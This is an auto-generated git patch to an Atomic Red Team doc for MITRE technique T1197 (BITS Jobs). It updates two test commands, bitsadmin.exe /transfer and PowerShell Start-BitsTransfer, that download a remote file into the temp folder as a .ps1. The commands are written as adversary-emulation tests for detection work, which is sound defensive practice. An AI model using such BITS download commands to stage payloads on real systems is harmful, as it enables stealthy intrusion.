From e7ff32080dc3f8d176dea83aef509167028eb56d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 20 Jun 2018 16:55:17 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=bitsadmin-fix-cs --- atomics/T1197/T1197.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index da8e7cf2..f79f5232 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -42,7 +42,7 @@ and execute a payload #### Run it with `command_prompt`! ``` -bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 +bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/59b33d16d7ace0bfb32d12fbcf166cc2a6dce129/atomics/T1197/T1197.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 ```

@@ -56,6 +56,6 @@ and execute a payload leveraging PowerShell #### Run it with `powershell`! ``` -Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 +Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/59b33d16d7ace0bfb32d12fbcf166cc2a6dce129/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 ```